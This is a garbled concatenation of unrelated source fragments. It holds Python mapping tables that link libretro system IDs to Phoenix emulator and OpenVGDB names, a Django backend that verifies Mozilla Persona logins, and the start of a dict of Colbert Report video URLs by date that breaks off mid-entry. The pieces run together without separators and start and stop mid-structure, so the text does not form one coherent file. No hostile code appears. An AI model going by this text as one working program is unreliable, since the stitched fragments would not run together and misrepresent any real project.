        "Nintendo - Switch":                                {"enabled": False, "defaultCore": "",                                   "friendlyName": "",                    "shortName": "", "manufacturer": "Nintendo"        },
}

    def phoenixSystems(self):
        """Return the Phoenix system database as an OrderedDict sorted by system name."""
        by_name = sorted(self.phoenixSystemDatabase.items(), key=lambda entry: entry[0])
        return OrderedDict(by_name)

    def libretroToPhoenix(self, libretroSystem):
        """Return the set of Phoenix system IDs registered for *libretroSystem*.

        Raises KeyError for an unknown libretro system ID.
        """
        mapping = self.libretroToPhoenixMap
        return mapping[libretroSystem]

    # This map essentially says "Register this Libretro core for this (these) Phoenix system(s)" when a .info file claims support for that system
    # If a core claims support for some Libretro ID, register that core for each Phoenix ID
    # Each value is a SET of Phoenix system IDs (one libretro ID may fan out to many systems).
    libretroToPhoenixMap = {
        "3DO":                                                      {"Panasonic - 3DO Interactive Multiplayer"},
        "Arcade (various)":                                         {"Arcade"},
        "Atari - 2600":                                             {"Atari - 2600"},
        "Atari - 5200":                                             {"Atari - 5200"},
        "Atari - 7800":                                             {"Atari - 7800"},
        "Atari - Jaguar":                                           {"Atari - Jaguar"},
        "Atari - Lynx":                                             {"Atari - Lynx"},
        "Atari ST/STE/TT/Falcon":                                   {"Atari - ST"},
        "Bandai - WonderSwan Color":                                {"Bandai - WonderSwan Color"},
        "Bandai - WonderSwan":                                      {"Bandai - WonderSwan"},
        "CHIP-8":                                                   {"CHIP-8"},
        "Commodore Amiga":                                          {"Commodore - Amiga"},
        "Commodore - C128":                                         {"Arcade"},
        "Commodore - 64":                                           {"Commodore - 64"},
        "CP System I":                                              {"Capcom - CP System I"},
        "CP System II":                                             {"Capcom - CP System II"},
        "CP System III":                                            {"Capcom - CP System III"},
        "CPC":                                                      {"Amstrad - CPC"},
        "DOS":                                                      {"DOS"},
        "FB Alpha - Arcade Games":                                  {"Arcade"},
        "GCE - Vectrex":                                            {"GCE - Vectrex"},
        "Handheld Electronic Game":                                 {"Nintendo - Game & Watch"},
        "IBM PC compatible":                                        {"IBM PC compatible"},
        "Magnavox - Odyssey2":                                      {"Magnavox - Odyssey2"},
        "MAME":                                                     {"Arcade"},
        "MAME2003":                                                 {"Arcade"},
        "Microsoft - MSX 2":                                        {"Microsoft - MSX 2"},
        "Microsoft - MSX2":                                         {"Microsoft - MSX 2"},
        "Microsoft - MSX":                                          {"Microsoft - MSX"},

        # MESS and UME
        # http://nonmame.retrogames.com/
        "MULTI (various)":                                          {
                                                                     "Atari - 2600",
                                                                     "Atari - 5200",
                                                                     "Atari - 7800",
                                                                     "Atari - Lynx",
                                                                     # Comma was missing here, which silently
                                                                     # concatenated the two WonderSwan IDs into
                                                                     # one bogus set element.
                                                                     "Bandai - WonderSwan Color",
                                                                     "Bandai - WonderSwan",
                                                                     "Capcom - CPS Changer",
                                                                     "Coleco - ColecoVision",
                                                                     "Fujitsu - FM Towns series",
                                                                     "Magnavox - Odyssey2",
                                                                     "Mattel - Intellivision",
                                                                     "NEC - PC Engine - TurboGrafx 16",
                                                                     "NEC - PC Engine CD - TurboGrafx-CD",
                                                                     "NEC - Super Grafx",
                                                                     "Nintendo - Game Boy Advance",
                                                                     "Nintendo - Game Boy",
                                                                     "Philips - Videopac+",
                                                                     "RCA - Studio II",
                                                                     "Sega - Game Gear",
                                                                     "Sega - Master System - Mark III",
                                                                     "Sega - Mega Drive - Genesis",
                                                                     "Sega - PICO",
                                                                     "Sega - SG-1000",
                                                                     "SNK - Neo Geo CD",
                                                                     "SNK - Neo Geo",
                                                                     "Watara - Supervision",
                                                                    },

        "NEC - PC Engine - TurboGrafx 16":                          {"NEC - PC Engine - TurboGrafx 16"},
        "NEC - PC Engine SuperGrafx":                               {"NEC - Super Grafx"},
        # NOTE(review): previously pointed at "NEC - Super Grafx" (apparent copy-paste
        # from the line above); the CD system has its own Phoenix ID matching the key.
        "NEC - PC Engine CD - TurboGrafx-CD":                       {"NEC - PC Engine CD - TurboGrafx-CD"},
        "NEC - PC-FX":                                              {"NEC - PC-FX - PC-FXGA"},
        "NEC - Super Grafx":                                        {"NEC - Super Grafx"},
        "Neo Geo":                                                  {"SNK - Neo Geo"},
        "Nintendo - 3DS":                                           {"Nintendo - Nintendo 3DS"},
        "Nintendo - Family Computer Disk System":                   {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Famicom Disk System":                           {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Game & Watch":                                  {"Nintendo - Game & Watch"},
        "Nintendo - Game Boy Advance (e-Cards)":                    {"Nintendo - Game Boy Advance (e-Cards)"},
        "Nintendo - Game Boy Advance":                              {"Nintendo - Game Boy Advance"},
        "Nintendo - Game Boy Color":                                {"Nintendo - Game Boy Color"},
        "Nintendo - Game Boy":                                      {"Nintendo - Game Boy"},
        "Nintendo - GameCube":                                      {"Nintendo - GameCube"},
        "Nintendo - Nintendo 64":                                   {"Nintendo - Nintendo 64"},
        "Nintendo - Nintendo 64DD":                                 {"Nintendo - Nintendo 64"},
        "Nintendo - Nintendo DS":                                   {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS (Download Play)":                   {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS (Download Play) (BETA)":            {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo DS Decrypted":                         {"Nintendo - Nintendo DS"},
        "Nintendo - Nintendo Entertainment System":                 {"Nintendo - Nintendo Entertainment System"},
        "Nintendo - Pokemon Mini":                                  {"Nintendo - Pokemon Mini"},
        "Nintendo - Sufami Turbo":                                  {"Nintendo - Sufami Turbo"},
        "Nintendo - Super Nintendo Entertainment System":           {"Nintendo - Super Nintendo Entertainment System"},
        "Nintendo - Virtual Boy":                                   {"Nintendo - Virtual Boy"},
        "Nintendo - Wii":                                           {"Nintendo - Wii"},
        "PC":                                                       {"IBM PC compatible"},
        "PC-FX":                                                    {"NEC - PC-FX - PC-FXGA"},
        "PC-98":                                                    {"NEC - PC-98 series"},
        # "Phillips" misspelling is the upstream libretro-side ID; keep as-is.
        "Phillips - Videopac+":                                     {"Philips - Videopac+"},
        "Sega - 32X":                                               {"Sega - 32X"},
        "Sega - Dreamcast":                                         {"Sega - Dreamcast"},
        "Sega - Game Gear":                                         {"Sega - Game Gear"},
        "Sega - Master System - Mark III":                          {"Sega - Master System - Mark III"},
        "Sega - Mega Drive - Genesis":                              {"Sega - Mega Drive - Genesis"},
        "Sega - Mega-CD - Sega CD":                                 {"Sega - Mega-CD"},
        "Sega - NAOMI":                                             {"Sega - Naomi"},
        "Sega - PICO":                                              {"Sega - PICO"},
        "Sega - Saturn":                                            {"Sega - Saturn"},
        "Sega - SG-1000":                                           {"Sega - SG-1000"},
        "Sharp - X68000":                                           {"Arcade"},
        "Sinclair - ZX 81":                                         {"Sinclair - ZX81"},
        "Sinclair - ZX Spectrum":                                   {"Sinclair - ZX Spectrum +3"},
        "Sinclair - ZX Spectrum +3":                                {"Sinclair - ZX Spectrum +3"},
        "SNK - Neo Geo Pocket Color":                               {"SNK - Neo Geo Pocket Color"},
        "SNK - Neo Geo Pocket":                                     {"SNK - Neo Geo Pocket"},
        "Sony - PlayStation Portable":                              {"Sony - PlayStation Portable"},
        "Sony - PlayStation":                                       {"Sony - PlayStation"},
        "The 3DO Company - 3DO":                                    {"Panasonic - 3DO Interactive Multiplayer"},
        "Uzebox":                                                   {"Arcade"},
        "ZX Spectrum (various)":                                    {"Sinclair - ZX Spectrum +3"},
    }

    # Not all Phoenix IDs are available in OpenVGDB; fail silently and gracefully if a match isn't found
    def phoenixToOpenVGDB(self, phoenixID):
        """Return the OpenVGDB system name for *phoenixID*, or "" when unmapped."""
        return self.phoenixToOpenVGDBMap.get(phoenixID, "")

    # Phoenix system ID -> OpenVGDB system name. A dict can hold only one value per
    # key: the original literal repeated "Atari - Jaguar" and "Nintendo - Nintendo
    # Entertainment System", so the later entries silently shadowed the earlier ones
    # and NES lookups returned "Nintendo Famicom Disk System". The inverse map
    # (openVGDBToPhoenixMap) folds both OpenVGDB names onto one Phoenix ID; the
    # forward value kept here is the cartridge-system name.
    phoenixToOpenVGDBMap = {
        "Panasonic - 3DO Interactive Multiplayer": "3DO Interactive Multiplayer",
        "Arcade": "Arcade",
        "Atari - 2600": "Atari 2600",
        "Atari - 5200": "Atari 5200",
        "Atari - 7800": "Atari 7800",
        "Atari - Jaguar": "Atari Jaguar",
        "Atari - Lynx": "Atari Lynx",
        "Bandai - WonderSwan Color": "Bandai WonderSwan Color",
        "Bandai - WonderSwan": "Bandai WonderSwan",
        "Coleco - ColecoVision": "Coleco ColecoVision",
        "GCE - Vectrex": "GCE Vectrex",
        "Mattel - Intellivision": "Intellivision",
        "Magnavox - Odyssey2": "Magnavox Odyssey2",
        "NEC - PC Engine CD - TurboGrafx-CD": "NEC PC Engine CD/TurboGrafx-CD",
        "NEC - PC Engine - TurboGrafx 16": "NEC PC Engine/TurboGrafx-16",
        "NEC - PC-FX - PC-FXGA": "NEC PC-FX",
        "NEC - Super Grafx": "NEC SuperGrafx",
        "Nintendo - Nintendo 64": "Nintendo 64",
        "Nintendo - Nintendo DS": "Nintendo DS",
        "Nintendo - Nintendo Entertainment System": "Nintendo Entertainment System",
        "Nintendo - Game Boy Advance": "Nintendo Game Boy Advance",
        "Nintendo - Game Boy Color": "Nintendo Game Boy Color",
        "Nintendo - Game Boy": "Nintendo Game Boy",
        "Nintendo - GameCube": "Nintendo GameCube",
        "Nintendo - Super Nintendo Entertainment System": "Nintendo Super Nintendo Entertainment System",
        "Nintendo - Virtual Boy": "Nintendo Virtual Boy",
        "Nintendo - Wii": "Nintendo Wii",
        "Sega - 32X": "Sega 32X",
        "Sega - Mega-CD": "Sega CD/Mega-CD",
        "Sega - Game Gear": "Sega Game Gear",
        "Sega - Mega Drive - Genesis": "Sega Genesis/Mega Drive",
        "Sega - Master System - Mark III": "Sega Master System",
        "Sega - Saturn": "Sega Saturn",
        "Sega - SG-1000": "Sega SG-1000",
        "SNK - Neo Geo Pocket Color": "SNK Neo Geo Pocket Color",
        "SNK - Neo Geo Pocket": "SNK Neo Geo Pocket",
        "Sony - PlayStation Portable": "Sony PlayStation Portable",
        "Sony - PlayStation": "Sony PlayStation",
    }

    def getOpenVGDBToPhoenixMap(self):
        """Return the OpenVGDB -> Phoenix ID map as an OrderedDict sorted by OpenVGDB name."""
        pairs = sorted(self.openVGDBToPhoenixMap.items(), key=lambda pair: pair[0])
        return OrderedDict(pairs)

    # Inverse lookup: OpenVGDB system name -> Phoenix system ID. Not injective:
    # several OpenVGDB names (e.g. "Atari Jaguar CD"/"Atari Jaguar" and
    # "Nintendo Famicom Disk System"/"Nintendo Entertainment System") map onto
    # the same Phoenix ID.
    openVGDBToPhoenixMap = {
        "3DO Interactive Multiplayer": "Panasonic - 3DO Interactive Multiplayer",
        "Arcade": "Arcade",
        "Atari 2600": "Atari - 2600",
        "Atari 5200": "Atari - 5200",
        "Atari 7800": "Atari - 7800",
        "Atari Jaguar CD": "Atari - Jaguar",
        "Atari Jaguar": "Atari - Jaguar",
        "Atari Lynx": "Atari - Lynx",
        "Bandai WonderSwan Color": "Bandai - WonderSwan Color",
        "Bandai WonderSwan": "Bandai - WonderSwan",
        "Coleco ColecoVision": "Coleco - ColecoVision",
        "GCE Vectrex": "GCE - Vectrex",
        "Intellivision": "Mattel - Intellivision",
        "Magnavox Odyssey2": "Magnavox - Odyssey2",
        "NEC PC Engine CD/TurboGrafx-CD": "NEC - PC Engine CD - TurboGrafx-CD",
        "NEC PC Engine/TurboGrafx-16": "NEC - PC Engine - TurboGrafx 16",
        "NEC PC-FX": "NEC - PC-FX - PC-FXGA",
        "NEC SuperGrafx": "NEC - Super Grafx",
        "Nintendo 64": "Nintendo - Nintendo 64",
        "Nintendo DS": "Nintendo - Nintendo DS",
        "Nintendo Entertainment System": "Nintendo - Nintendo Entertainment System",
        "Nintendo Famicom Disk System": "Nintendo - Nintendo Entertainment System",
        "Nintendo Game Boy Advance": "Nintendo - Game Boy Advance",
        "Nintendo Game Boy Color": "Nintendo - Game Boy Color",
        "Nintendo Game Boy": "Nintendo - Game Boy",
        "Nintendo GameCube": "Nintendo - GameCube",
        "Nintendo Super Nintendo Entertainment System": "Nintendo - Super Nintendo Entertainment System",
        "Nintendo Virtual Boy": "Nintendo - Virtual Boy",
        "Nintendo Wii": "Nintendo - Wii",
        "Sega 32X": "Sega - 32X",
        "Sega CD/Mega-CD": "Sega - Mega-CD",
        "Sega Game Gear": "Sega - Game Gear",
        "Sega Genesis/Mega Drive": "Sega - Mega Drive - Genesis",
        "Sega Master System": "Sega - Master System - Mark III",
        "Sega Saturn": "Sega - Saturn",
        "Sega SG-1000": "Sega - SG-1000",
        "SNK Neo Geo Pocket Color": "SNK - Neo Geo Pocket Color",
        "SNK Neo Geo Pocket": "SNK - Neo Geo Pocket",
        "Sony PlayStation Portable": "Sony - PlayStation Portable",
        "Sony PlayStation": "Sony - PlayStation",
    }

    def filterUnusedCores(self):
        """Remove cores Phoenix should not register from ``self.coreInfo["cores"]``.

        Mutates the dict in place. Iterates over a snapshot (``list``) of the
        keys because deleting entries while iterating a dict's live key view
        raises ``RuntimeError`` on Python 3.
        """
        # Cores previously considered for filtering with no reason recorded
        # (kept for history, all currently allowed through):
        # 4do, 81, bluemsx, bsnes_accuracy, bsnes_balanced, bsnes_performance,
        # cap32, catsfc, dosbox, emux_chip8, fb_alpha_cps1, fb_alpha_cps2,
        # fmsx, gpsp, gw, handy, hatari, imame4all, mame078, mame2010,
        # mame2014, meteor, o2em, prosystem, puae, ume2014, vecx,
        # virtualjaguar
        for key in list(self.coreInfo["cores"]):
            # ARM cores: any pcsx variant, plus pocketsnes
            if "pcsx" in key or key == "pocketsnes_libretro":
                del self.coreInfo["cores"][key]

# accounts/authentication.py


import requests
import logging

from django.conf import settings
from django.contrib.auth import get_user_model

logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'


class PersonaAuthenticationBackend(object):
    """Django authentication backend that verifies Mozilla Persona assertions.

    ``authenticate`` POSTs the browser-supplied assertion to the Persona
    verifier service; ``get_user`` rehydrates the user from the email stored
    in the session.
    """

    def authenticate(self, assertion):
        """Verify *assertion* with Persona.

        Returns the matching ``User`` (creating one on first login), or
        ``None`` implicitly when verification fails.
        """
        # Use the module-level logger (was logging.warning, which bypassed
        # this module's named logger and went to the root logger instead).
        logger.warning('entering authenticate function')
        response = requests.post(
            PERSONA_VERIFY_URL,
            data={'assertion': assertion, 'audience': settings.DOMAIN}
        )
        logger.warning('got response from persona')
        logger.warning(response.content.decode())
        if response.ok and response.json()['status'] == 'okay':
            email = response.json()['email']
            try:
                return User.objects.get(email=email)
            except User.DoesNotExist:
                return User.objects.create(email=email)
        else:
            logger.warning(
                'Persona says no. Json was: {}'.format(response.json())
                )

    def get_user(self, email):
        """Backend hook: return the ``User`` for *email*, or ``None`` if absent."""
        try:
            return User.objects.get(email=email)
        except User.DoesNotExist:
            return None

import os
import sys
import subprocess

testP = {
  "2005": [
    {
      "date": "2005-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/61f6xj/intro---10-17-05",
        "http://thecolbertreport.cc.com/videos/w9dr6d/first-show",
        "http://thecolbertreport.cc.com/videos/63ite2/the-word---truthiness",
        "http://thecolbertreport.cc.com/videos/2hvbwp/threatdown---bird-flu",
        "http://thecolbertreport.cc.com/videos/ydz3a0/stone-phillips",
        "http://thecolbertreport.cc.com/videos/4ewylv/gravitas-off-with-stone-phillips",
        "http://thecolbertreport.cc.com/videos/e3mrnm/sign-off---commemorating-chewbacca-s-american-citizenship"
      ],
      "guest": "Stone Phillips"
    },
    {
      "date": "2005-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u39l6v/intro---10-18-05",
        "http://thecolbertreport.cc.com/videos/kzin67/the-word---bacchanalia",
        "http://thecolbertreport.cc.com/videos/5icgst/all-you-need-to-know---illegal-immigration",
        "http://thecolbertreport.cc.com/videos/fydq17/lesley-stahl",
        "http://thecolbertreport.cc.com/videos/235ftw/better-know-a-district---georgia-s-1st---jack-kingston",
        "http://thecolbertreport.cc.com/videos/joj31r/sign-off---a-fax-from-james-brady"
      ],
      "guest": "Lesley Stahl"
    },
    {
      "date": "2005-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vmoc19/intro---10-19-05",
        "http://thecolbertreport.cc.com/videos/gpmykq/the-word---disappointed",
        "http://thecolbertreport.cc.com/videos/95k30i/stephen-settles-the-debate---whales-and-cod-vs--polar-bears-and-seal-hunters",
        "http://thecolbertreport.cc.com/videos/p42ju6/on-notice---bobby-s-candy-apples",
        "http://thecolbertreport.cc.com/videos/malmcz/tip-wag---teen-pregnancy---katie-s-no-lady",
        "http://thecolbertreport.cc.com/videos/db0w9q/fareed-zakaria",
        "http://thecolbertreport.cc.com/videos/8kkcau/sign-off---the-in-box---you-re-great"
      ],
      "guest": "Fareed Zakaria"
    },
    {
      "date": "2005-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rwhdnt/intro---10-20-05",
        "http://thecolbertreport.cc.com/videos/p1n8k4/avian-flu",
        "http://thecolbertreport.cc.com/videos/mk7yrx/russ-lieber---candy-and-air",
        "http://thecolbertreport.cc.com/videos/cz3euw/un-american-news---the-foreign-press",
        "http://thecolbertreport.cc.com/videos/j1b7vj/jim-cramer",
        "http://thecolbertreport.cc.com/videos/rohluc/sign-off---credit-cards",
        "http://thecolbertreport.cc.com/videos/24lb41/the-word---love-handles"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2005-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/67cs19/intro---10-24-05",
        "http://thecolbertreport.cc.com/videos/gv2cjs/the-word---pussy",
        "http://thecolbertreport.cc.com/videos/i491tt/lou-dobbs",
        "http://thecolbertreport.cc.com/videos/dd1sbx/fract---the-wright-brothers",
        "http://thecolbertreport.cc.com/videos/wtqx4r/bring--em-back-or-leave--em-dead---inquisition",
        "http://thecolbertreport.cc.com/videos/qgvny1/mug-shot",
        "http://thecolbertreport.cc.com/videos/vuftif/against-the-pundocracy"
      ],
      "guest": "Lou Dobbs"
    },
    {
      "date": "2005-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lldiq0/intro---10-25-05",
        "http://thecolbertreport.cc.com/videos/whvmzj/benjamin-shalom-bernanke",
        "http://thecolbertreport.cc.com/videos/iqvyat/the-word---overrated",
        "http://thecolbertreport.cc.com/videos/qwe0c7/threatdown---anti-bacterial-soap",
        "http://thecolbertreport.cc.com/videos/7ioxmq/greg-behrendt",
        "http://thecolbertreport.cc.com/videos/nwkm8y/greg-behrendt-fields-calls",
        "http://thecolbertreport.cc.com/videos/vzk1ho/yet-another-day---soup-and-pets"
      ],
      "guest": "Greg Behrendt"
    },
    {
      "date": "2005-10-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nxsljd/intro---10-26-05",
        "http://thecolbertreport.cc.com/videos/39lnsj/outsourcing",
        "http://thecolbertreport.cc.com/videos/7o86ff/the-word---perspective",
        "http://thecolbertreport.cc.com/videos/yuq4bm/neil-degrasse-tyson",
        "http://thecolbertreport.cc.com/videos/5fyjl2/tip-wag---public-nudity-advice",
        "http://thecolbertreport.cc.com/videos/wsfpru/the-pulse"
      ],
      "guest": "Neil deGrasse Tyson"
    },
    {
      "date": "2005-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ap807f/intro---10-27-05",
        "http://thecolbertreport.cc.com/videos/nb6dxf/lieber---white-pumpkins",
        "http://thecolbertreport.cc.com/videos/llj5fu/the-word---quitter",
        "http://thecolbertreport.cc.com/videos/1vbs16/bookshelf-of-broken-dreams",
        "http://thecolbertreport.cc.com/videos/ynldrg/fract---the-states",
        "http://thecolbertreport.cc.com/videos/zyop79/better-know-a-district---massachusetts--4th---barney-frank",
        "http://thecolbertreport.cc.com/videos/h9zw2j/jeff-daniels",
        "http://thecolbertreport.cc.com/videos/3eb29d/yet-another-day---checking-in-with-christina-and-ernesto"
      ],
      "guest": "Jeff Daniels"
    },
    {
      "date": "2005-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/11fva6/intro---10-31-05",
        "http://thecolbertreport.cc.com/videos/mqoacz/criminal-intent",
        "http://thecolbertreport.cc.com/videos/p3782h/patrick-fitzgerald-s-press-conference",
        "http://thecolbertreport.cc.com/videos/ey4w8s/the-word---alito",
        "http://thecolbertreport.cc.com/videos/jfbl04/monica-crowley",
        "http://thecolbertreport.cc.com/videos/sxj08u/fract---greatest-lakes",
        "http://thecolbertreport.cc.com/videos/5d63df/stephen-settles-the-debate---ramadan-or-halloween-",
        "http://thecolbertreport.cc.com/videos/qc29ld/rocktober"
      ],
      "guest": "Monica Crowley"
    },
    {
      "date": "2005-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zu9d3/intro---11-1-05",
        "http://thecolbertreport.cc.com/videos/r7fmyb/the-word---camilla-mania",
        "http://thecolbertreport.cc.com/videos/ufgobt/emergency-evacuation-plan",
        "http://thecolbertreport.cc.com/videos/b7u1wy/ken-burns",
        "http://thecolbertreport.cc.com/videos/kpjrtm/formidable-opponent---charity"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2005-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1kskdq/intro---11-2-05",
        "http://thecolbertreport.cc.com/videos/xp1gbs/fatwa",
        "http://thecolbertreport.cc.com/videos/8e6qo8/c-span-coverage",
        "http://thecolbertreport.cc.com/videos/ayw8g9/the-word---cat",
        "http://thecolbertreport.cc.com/videos/ey3oos/fract---civil-war",
        "http://thecolbertreport.cc.com/videos/9438aw/the-war-on-wal-mart",
        "http://thecolbertreport.cc.com/videos/nvopei/bruce-feiler",
        "http://thecolbertreport.cc.com/videos/6v0azb/lieber---one-testicle"
      ],
      "guest": "Bruce Feiler"
    },
    {
      "date": "2005-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4g6fdp/intro---11-3-05",
        "http://thecolbertreport.cc.com/videos/9lmjfq/the-word---shhhh----",
        "http://thecolbertreport.cc.com/videos/tq3k8n/bradley-whitford",
        "http://thecolbertreport.cc.com/videos/wwof8g/fract---karl-marx",
        "http://thecolbertreport.cc.com/videos/cxtvxm/better-know-a-district---ohio-s-11th---stephanie-tubbs-jones",
        "http://thecolbertreport.cc.com/videos/86juj9/judge-tubbs",
        "http://thecolbertreport.cc.com/videos/mkig56/the-in-box---kicking-ass"
      ],
      "guest": "Bradley Whitford"
    },
    {
      "date": "2005-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbtbtl/intro---11-7-05",
        "http://thecolbertreport.cc.com/videos/s0yn8n/rioting-do-s-and-don-ts",
        "http://thecolbertreport.cc.com/videos/2iezg1/the-word---hoser",
        "http://thecolbertreport.cc.com/videos/dzis1b/fract---frnap--the-freedom-snap",
        "http://thecolbertreport.cc.com/videos/1xhewi/threatdown---pirates",
        "http://thecolbertreport.cc.com/videos/fjfr4z/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/ufqqpc/rock--em-sock--em-robots"
      ],
      "guest": "Eliot Spitzer"
    },
    {
      "date": "2005-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2lgs12/intro---11-8-05",
        "http://thecolbertreport.cc.com/videos/5lxdom/america-doesn-t-torture",
        "http://thecolbertreport.cc.com/videos/xul3qa/intercepted-satellite-feed",
        "http://thecolbertreport.cc.com/videos/huzs1z/the-word---t-o-",
        "http://thecolbertreport.cc.com/videos/7nl1pw/fract---franagram--american-patriot",
        "http://thecolbertreport.cc.com/videos/wgvsjo/tip-wag---convicted-murderers",
        "http://thecolbertreport.cc.com/videos/0l19is/catherine-crier",
        "http://thecolbertreport.cc.com/videos/6zdr9d/wilford-brimley-calls---cocoon",
        "http://thecolbertreport.cc.com/videos/ykxirt/yet-another-day---flesh-eating-virus"
      ],
      "guest": "Catherine Crier"
    },
    {
      "date": "2005-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s6miz8/intro---11-9-05",
        "http://thecolbertreport.cc.com/videos/5fvmyv/next-question",
        "http://thecolbertreport.cc.com/videos/bcmkct/the-word---willy-loman",
        "http://thecolbertreport.cc.com/videos/43es16/all-you-need-to-know---kansas-education",
        "http://thecolbertreport.cc.com/videos/nzfogn/mary-roach",
        "http://thecolbertreport.cc.com/videos/gqeqrk/better-know-a-district---florida-s-7th---john-mica"
      ],
      "guest": "Mary Roach"
    },
    {
      "date": "2005-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jqfk3o/intro---11-10-05",
        "http://thecolbertreport.cc.com/videos/8c7dra/swear-to-god",
        "http://thecolbertreport.cc.com/videos/9kcrqk/the-word---armistice",
        "http://thecolbertreport.cc.com/videos/o63fqi/cokie-roberts",
        "http://thecolbertreport.cc.com/videos/bd1uuq/the-in-box---asian-stereotypes",
        "http://thecolbertreport.cc.com/videos/c0bksd/the-dacolbert-code---samuel-alito"
      ],
      "guest": "Cokie Roberts"
    },
    {
      "date": "2005-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e5zymg/intro---11-14-05",
        "http://thecolbertreport.cc.com/videos/gfzikt/cma-buzz",
        "http://thecolbertreport.cc.com/videos/jaukv1/the-word---testosterone",
        "http://thecolbertreport.cc.com/videos/oel1ef/bob-kerrey",
        "http://thecolbertreport.cc.com/videos/2lpp85/tip-line---flag-sticker",
        "http://thecolbertreport.cc.com/videos/1wb4cs/un-american-news---shame-cotton",
        "http://thecolbertreport.cc.com/videos/kuqe6u/internets-anniversary"
      ],
      "guest": "Sen. Bob Kerrey"
    },
    {
      "date": "2005-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c8h749/intro---11-15-05",
        "http://thecolbertreport.cc.com/videos/9jy462/sayako-s-wedding",
        "http://thecolbertreport.cc.com/videos/yctr24/the-word---the-orient",
        "http://thecolbertreport.cc.com/videos/4z4p4o/bring--em-back-or-leave--em-dead---asian-history",
        "http://thecolbertreport.cc.com/videos/94g5r1/al-sharpton",
        "http://thecolbertreport.cc.com/videos/9disf3/fract---mt--rushmore",
        "http://thecolbertreport.cc.com/videos/w11pi7/formidable-opponent---torture"
      ],
      "guest": "Rev. Al Sharpton"
    },
    {
      "date": "2005-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nl3o0c/intro---11-16-05",
        "http://thecolbertreport.cc.com/videos/ebxyv5/the-word---information",
        "http://thecolbertreport.cc.com/videos/eh69qj/on-notice-dead-to-me---juan-gabriel",
        "http://thecolbertreport.cc.com/videos/h1e498/better-know-a-district---colorado-s-2nd---mark-udall",
        "http://thecolbertreport.cc.com/videos/ddef4x/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/4kvhir/america--sleep-safe"
      ],
      "guest": "Matt Taibbi"
    },
    {
      "date": "2005-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zl8rtq/intro---11-17-05",
        "http://thecolbertreport.cc.com/videos/f8fusi/no-good-deed",
        "http://thecolbertreport.cc.com/videos/pxeto4/the-word---mcconaughey-",
        "http://thecolbertreport.cc.com/videos/bypiaq/threatdown---children",
        "http://thecolbertreport.cc.com/videos/smm3x9/tim-robbins",
        "http://thecolbertreport.cc.com/videos/wk6dps/here-today--more-tomorrow",
        "http://thecolbertreport.cc.com/videos/8sxlv8/thanksgiving-vacation"
      ],
      "guest": "Tim Robbins"
    },
    {
      "date": "2005-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sf87bf/intro---11-28-05",
        "http://thecolbertreport.cc.com/videos/nrf3km/cyber-monday",
        "http://thecolbertreport.cc.com/videos/sqsdz6/the-word---never",
        "http://thecolbertreport.cc.com/videos/r6xqra/viewer-phone-calls",
        "http://thecolbertreport.cc.com/videos/vdncvg/stephen-settles-the-debate---science-vs--faith",
        "http://thecolbertreport.cc.com/videos/507rw4/brian-greene",
        "http://thecolbertreport.cc.com/videos/ngo5nh/sign-off---check-your-local-listings"
      ],
      "guest": "Brian Greene"
    },
    {
      "date": "2005-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4yku0o/intro---11-29-05",
        "http://thecolbertreport.cc.com/videos/zaot6p/better-know-a-district---california-s-50th---randy--duke--cunningham",
        "http://thecolbertreport.cc.com/videos/o2kdz0/the-word---confidence",
        "http://thecolbertreport.cc.com/videos/6f1i25/was-it-really-that-bad----black-death",
        "http://thecolbertreport.cc.com/videos/75dr62/the--duke-s--things",
        "http://thecolbertreport.cc.com/videos/rtbpes/richard-preston"
      ],
      "guest": "Richard Preston"
    },
    {
      "date": "2005-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/951mir/intro---11-30-05",
        "http://thecolbertreport.cc.com/videos/jsl09o/the-word---gay-gay-gay-gay-gay",
        "http://thecolbertreport.cc.com/videos/h7okp1/fract---nobody-messes-with-house",
        "http://thecolbertreport.cc.com/videos/ut6y25/katrina-vanden-heuvel",
        "http://thecolbertreport.cc.com/videos/0frx2n/around-the-world-in-11-6-seconds---media"
      ],
      "guest": "Katrina vanden Heuvel"
    },
    {
      "date": "2005-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j4tan3/intro---12-1-05",
        "http://thecolbertreport.cc.com/videos/bocj8y/giant-gold-washer",
        "http://thecolbertreport.cc.com/videos/w4dblj/the-word---spectacle",
        "http://thecolbertreport.cc.com/videos/3yvygm/tip-wag---seattle",
        "http://thecolbertreport.cc.com/videos/idpn3b/richard-clarke",
        "http://thecolbertreport.cc.com/videos/9icneu/face-transplant"
      ],
      "guest": "Richard Clarke"
    },
    {
      "date": "2005-12-05",
      "videos": [
